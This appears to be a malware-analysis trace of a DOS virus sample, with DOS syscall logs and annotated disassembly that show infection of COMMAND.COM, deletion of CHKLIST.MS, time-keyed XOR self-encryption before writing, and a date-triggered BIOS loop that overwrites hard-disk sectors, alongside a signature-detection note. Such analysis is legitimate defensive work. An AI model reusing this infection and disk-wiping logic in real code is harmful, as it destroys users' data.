; (CL = minute, DH = second, DL = 1/100 s).
; DL becomes a one-byte value mixed from the time fields and is used as a
; single-byte XOR key over ES:[0x57..]; the key is also stored at ES:0x3d1.
; The buffer (0x3d2 = 978 bytes) is then written to the open file handle.
; Detection note: the loop never touches offsets below 0x57, so the encoded
; part presumably differs between writes while that leading region stays
; constant - anchor byte signatures there and confirm against the written file.
0x13559: add dl, cl  ; DL = hundredths + seconds + minutes (mod 256)
0x1355b: mov bx, 0x3d1
0x1355e: mov byte ptr es:[bx], dl  ; store the key byte at ES:0x3d1
0x13561: mov di, 0x57  ; first offset to encode
0x13564: pop cx  ; CX = word pushed outside this listing
0x13565: sub cx, di
0x13567: sub cx, 0x104  ; loop count = popped value - 0x57 - 0x104
0x1356b: xor byte ptr es:[di], dl  ; single-byte XOR in place
0x1356e: inc di
0x1356f: loop 0x1356b
0x13571: mov ax, es
0x13573: mov ds, ax  ; DS = buffer segment for the write
0x13575: push cs
0x13576: pop es  ; ES = CS
0x13577: pop bx  ; BX = file handle (the trace row that follows reports handle 5)
0x13578: mov ah, 0x40  ; DOS Write file or device
0x1357a: mov cx, 0x3d2  ; byte count 0x3d2 = 978
0x1357d: xor dx, dx  ; source = DS:0000
0x1357f: int 0x21
2018-12-25T12:44:37.630532591Z 64 PC: 13581 | Write file or device (Write 978 bytes on handle 5)
2018-12-25T12:44:37.652073253Z 64 PC: 1358d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:37.660002166Z 87 PC: 1359e | Get or set file date and time
2018-12-25T12:44:37.662229094Z 62 PC: 135a6 | Close file
2018-12-25T12:44:37.66526957Z 67 PC: 135b2 | Get or set file attributes
2018-12-25T12:44:37.67589975Z 65 PC: 1360d | Delete file (See above)
2018-12-25T12:44:37.682711403Z 14 PC: 135c1 | Set default drive (Drive = 'A')
2018-12-25T12:44:37.685206844Z 59 PC: 135c8 | Change current directory
2018-12-25T12:44:37.690100269Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=00000834h/0000002100d bytes. ')
2018-12-25T12:44:37.695572451Z 48 PC: 12a8f | Get DOS version
2018-12-25T12:44:37.697929558Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T12:44:37.704421941Z 93 PC: 12afe | File sharing functions
2018-12-25T12:44:37.706089384Z 9 PC: 12a86 | Display string (See above)
2018-12-25T12:44:37.726214455Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":15810,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:44:36.811771181Z 42 PC: 132d9 | Get date 0x132d9: cmp cx, 0x7ca
; Continuation of the listing that starts on the preceding trace row
; (0x132d9: cmp cx, 0x7ca), i.e. right after DOS "Get date" returns.
; DOS Get date (int 21h, AH=2Ah) returns CX = year, DH = month, DL = day.
; Date gate: year >= 0x7ca (1994) or month >= 6 branches to 0x13321, which is
; not listed here; any other date jumps straight to 0x1332a.
; 0x132e7..0x13307 is a BIOS int 13h sector-write loop against drive 0x80.
; It is not reachable by fall-through (the jmp at 0x132e4 is unconditional);
; the only branch to it shown on this page is `je 0x132e7` at 0x13328.
; NOTE(review): no int 0x13 activity appears among this run's trace rows, and
; whether the tracer records BIOS calls at all is not visible here, so do not
; read the trace as evidence that the disk-write path is inert.
0x132dd: jge 0x13321  ; signed test of the cmp on the previous row: year >= 1994
0x132df: cmp dh, 6  ; DH = month
0x132e2: jae 0x13321  ; month >= 6
0x132e4: jmp 0x1332a  ; otherwise bypass the disk-write block below
0x132e7: xor cx, cx  ; int 13h: CH = cylinder 0, CL = 0 (sector field)
0x132e9: mov dx, 0x80  ; DH = head 0, DL = 0x80 (first fixed disk)
0x132ec: mov ax, 0x311  ; AH = 03h write sectors, AL = 0x11 (17 sectors)
0x132ef: mov bx, 0xb000
0x132f2: mov es, bx  ; data buffer ES:BX = B000:B000
0x132f4: int 0x13  ; BIOS disk write: overwrites sectors on the fixed disk
0x132f6: jae 0x132fc  ; CF clear = call succeeded
0x132f8: xor ah, ah  ; AH = 00h: reset disk system after a failed write
0x132fa: int 0x13
0x132fc: inc dh  ; next head
0x132fe: cmp dh, 4
0x13301: jb 0x132ef  ; heads 0..3; re-enters after the mov ax, so AX holds whatever int 0x13 returned
0x13303: xor dh, dh  ; back to head 0
0x13305: inc ch  ; next cylinder
0x13307: cmp ch, 0x20  ; bound of 0x20 cylinders; the branch that uses it is cut off
2018-12-25T12:44:36.814550894Z 44 PC: 1332f | Get time 0x1332f: sub bx, 0x104
; Continuation of the listing that starts on the preceding trace row
; (0x1332f: sub bx, 0x104), right after DOS "Get time" returns.
; DOS Get time (int 21h, AH=2Ch) returns CH = hour, CL = minute,
; DH = second, DL = 1/100 s. Where BX came from is outside this listing.
; The code stores the time, derives a 0/3 flag from the parity of the seconds,
; then queries the default drive and prepares a Get current directory call.
0x13333: mov word ptr [bx], cx  ; save CX (hour:minute) at [BX]
0x13335: mov word ptr [bx + 2], dx  ; save DX (second:hundredths) at [BX+2]
0x13338: mov al, dh  ; AL = seconds
0x1333a: mov dh, 0
0x1333c: mov ah, dh  ; AX = seconds, zero-extended for the 8-bit divide
0x1333e: mov dl, 2
0x13340: div dl  ; AL = seconds / 2, AH = seconds % 2
0x13342: cmp ah, 0
0x13345: jne 0x1334f  ; odd second
0x13347: mov byte ptr [0xff00], 0  ; even second: byte at DS:0xff00 = 0
0x1334c: jmp 0x13354
0x1334f: mov byte ptr [0xff00], 3  ; odd second: byte at DS:0xff00 = 3 (its later use is not visible here)
0x13354: mov ah, 0x19  ; DOS Get default drive
0x13356: int 0x21  ; returns AL = drive number (0 = A:)
0x13358: mov byte ptr [0xffbc], al  ; keep the drive number at DS:0xffbc
0x1335b: mov ah, 0x47  ; DOS Get current directory
0x1335d: mov dh, 0
0x1335f: add al, 1  ; AH=47h takes a 1-based drive number in DL
0x13361: mov dl, al
2018-12-25T12:44:36.816832115Z 25 PC: 13358 | Get default drive
2018-12-25T12:44:36.818090517Z 71 PC: 13368 | Get current directory
2018-12-25T12:44:36.821644686Z 26 PC: 13374 | Set disk transfer address
2018-12-25T12:44:36.82268659Z 14 PC: 13380 | Set default drive (Drive = 'C')
2018-12-25T12:44:36.823947074Z 59 PC: 13391 | Change current directory
2018-12-25T12:44:36.82765059Z 78 PC: 133c5 | Find first file
2018-12-25T12:44:36.8329263Z 67 PC: 13448 | Get or set file attributes
2018-12-25T12:44:36.836227896Z 67 PC: 13454 | Get or set file attributes
2018-12-25T12:44:37.583279143Z 61 PC: 1345c | Open file (Filename = 'COMMAND.COM')
2018-12-25T12:44:37.590423608Z 66 PC: 13467 | Move file pointer
2018-12-25T12:44:37.591724594Z 66 PC: 13476 | Move file pointer
2018-12-25T12:44:37.593143Z 63 PC: 13480 | Read file or device (Read 80 bytes on handle 5)
2018-12-25T12:44:37.600517153Z 65 PC: 1360d | Delete file (Filename = 'CHKLIST.MS')
2018-12-25T12:44:37.605730776Z 66 PC: 134ea | Move file pointer
2018-12-25T12:44:37.607187464Z 66 PC: 134fb | Move file pointer
2018-12-25T12:44:37.609258107Z 63 PC: 13505 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:44:37.611931442Z 66 PC: 1350e | Move file pointer
2018-12-25T12:44:37.613494009Z 64 PC: 1352d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:37.624687412Z 66 PC: 13536 | Move file pointer
2018-12-25T12:44:37.626193904Z 44 PC: 13557 | Get time 0x13557: add dl, dh
; Continuation of the listing that starts on the preceding trace row
; (0x13557: add dl, dh), right after DOS "Get time" returns
; (CL = minute, DH = second, DL = 1/100 s).
; DL becomes a one-byte value mixed from the time fields and is used as a
; single-byte XOR key over ES:[0x57..]; the key is also stored at ES:0x3d1.
; The buffer (0x3d2 = 978 bytes) is then written to the open file handle.
; Detection note: the loop never touches offsets below 0x57, so the encoded
; part presumably differs between writes while that leading region stays
; constant - anchor byte signatures there and confirm against the written file.
0x13559: add dl, cl  ; DL = hundredths + seconds + minutes (mod 256)
0x1355b: mov bx, 0x3d1
0x1355e: mov byte ptr es:[bx], dl  ; store the key byte at ES:0x3d1
0x13561: mov di, 0x57  ; first offset to encode
0x13564: pop cx  ; CX = word pushed outside this listing
0x13565: sub cx, di
0x13567: sub cx, 0x104  ; loop count = popped value - 0x57 - 0x104
0x1356b: xor byte ptr es:[di], dl  ; single-byte XOR in place
0x1356e: inc di
0x1356f: loop 0x1356b
0x13571: mov ax, es
0x13573: mov ds, ax  ; DS = buffer segment for the write
0x13575: push cs
0x13576: pop es  ; ES = CS
0x13577: pop bx  ; BX = file handle (the trace row that follows reports handle 5)
0x13578: mov ah, 0x40  ; DOS Write file or device
0x1357a: mov cx, 0x3d2  ; byte count 0x3d2 = 978
0x1357d: xor dx, dx  ; source = DS:0000
0x1357f: int 0x21
2018-12-25T12:44:37.628789401Z 64 PC: 13581 | Write file or device (Write 978 bytes on handle 5)
2018-12-25T12:44:37.63967314Z 64 PC: 1358d | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:37.642402495Z 87 PC: 1359e | Get or set file date and time
2018-12-25T12:44:37.643948451Z 62 PC: 135a6 | Close file
2018-12-25T12:44:37.64654522Z 67 PC: 135b2 | Get or set file attributes
2018-12-25T12:44:37.656571008Z 65 PC: 1360d | Delete file (See above)
2018-12-25T12:44:37.662553474Z 14 PC: 135c1 | Set default drive (Drive = 'A')
2018-12-25T12:44:37.668857735Z 59 PC: 135c8 | Change current directory
2018-12-25T12:44:37.680883622Z 9 PC: 12a86 | Display string (String= 'Goat file (COM/....). Size=00000834h/0000002100d bytes. ')
2018-12-25T12:44:37.691099938Z 48 PC: 12a8f | Get DOS version
2018-12-25T12:44:37.696435181Z 61 PC: 12b5c | Open file (Filename = '')
2018-12-25T12:44:37.703298056Z 93 PC: 12afe | File sharing functions
2018-12-25T12:44:37.70511714Z 9 PC: 12a86 | Display string (See above)
2018-12-25T12:44:37.714401709Z 76 PC: 12ae3 | Terminate with return code (Return code = '1')